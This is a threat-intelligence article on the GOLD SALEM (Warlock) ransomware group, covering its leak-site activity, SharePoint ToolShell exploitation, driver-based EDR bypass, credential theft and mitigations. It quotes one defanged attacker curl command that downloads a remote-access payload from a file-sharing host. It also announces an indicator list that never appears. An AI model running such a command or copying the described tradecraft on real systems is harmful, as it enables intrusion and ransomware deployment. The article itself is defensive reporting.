Warlock Ransomware Deployed via Compromised GOLD SALEM Networks and Bypassed Security Solutions

Counter Threat Unit (CTU) researchers are tracking a sophisticated threat actor known as Warlock Group, which CTU designates as GOLD SALEM.

Since March 2025, the group has compromised enterprise networks and bypassed security solutions to deploy its custom Warlock ransomware.

While Microsoft refers to this collective as Storm-2603 and associates it “with moderate confidence to be a China-based threat actor,” CTU researchers have not confirmed any geographic attribution.

Through mid-September 2025, GOLD SALEM published 60 victims to its dedicated leak site, placing it in the mid-range of ransomware operations by victim count this year.

Targets span small commercial firms, government agencies, and multinationals across North America, Europe, and South America.

Uncharacteristically, the group avoided Chinese and Russian organizations until September 8, when a Russia-based engineering services provider in the electricity generation sector appeared on the leak site.

This inclusion suggests the actors may operate from outside jurisdictions that aggressively pursue ransomware extortionists.

GOLD SALEM’s Tor-hosted leak site batches victim listings, and as of September 16, only 19 victims (32%) had their stolen data published, while 27 (45%) were reportedly sold to private buyers.

GOLD SALEM has posted the names of victims compromised by different ransomware operations.

Initial Access and Tradecraft

The group first surfaced publicly via a June 2025 post on the RAMP underground forum, soliciting exploits for enterprise applications (Veeam, ESXi, SharePoint) and tools to kill endpoint detection and response systems.

Such figures may be inflated, and three previously listed victims were removed, indicating possible data validation or pay-off adjustments. The group’s leak site assigns each victim a ransom countdown date, typically 12–14 days post-listing, to pressure swift payment.

It remains unclear whether these posts targeted direct intrusions or recruitment of affiliates for a ransomware-as-a-service model.

CTU researchers observed the group exploit Microsoft SharePoint using the ToolShell exploit chain, leveraging CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771 to plant an ASPX web shell. Through this shell, attackers executed commands such as:

textcurl -L -o c:\users\public\Sophos\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt  

This downloaded a Golang-based WebSockets server, granting persistent remote access. The group bypassed EDR by renaming a vulnerable Baidu Antivirus driver (CVE-2024-51324) to googleApiUtil64.sys, enabling termination of security agents.

Post-compromise activities included credential harvesting with Mimikatz targeting LSASS memory, lateral movement via PsExec and Impacket, and deployment of the Warlock payload through Group Policy Objects.

In August, GOLD SALEM abused the open-source Velociraptor DFIR tool to establish Visual Studio Code network tunnels, illustrating their adaptable tooling and willingness to repurpose legitimate utilities for malicious ends.

Mitigations

To defend against this threat, organizations should maintain aggressive patching for internet-facing services and implement continuous attack surface monitoring.

Proactive endpoint monitoring and rapid incident response are critical to detect zero-day exploitation. Sophos protections Troj/WebShel-F and Troj/Warlock-B can identify related activity.

CTU researchers recommend reviewing and restricting access using the following indicators:

Organizations should validate these hashes against network and endpoint telemetry and ensure robust segmentation to limit lateral movement.

Continuous threat hunting for signs of ToolShell exploitation and BYOVD techniques can further reduce the risk posed by GOLD SALEM’s evolving Warlock ransomware operation.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.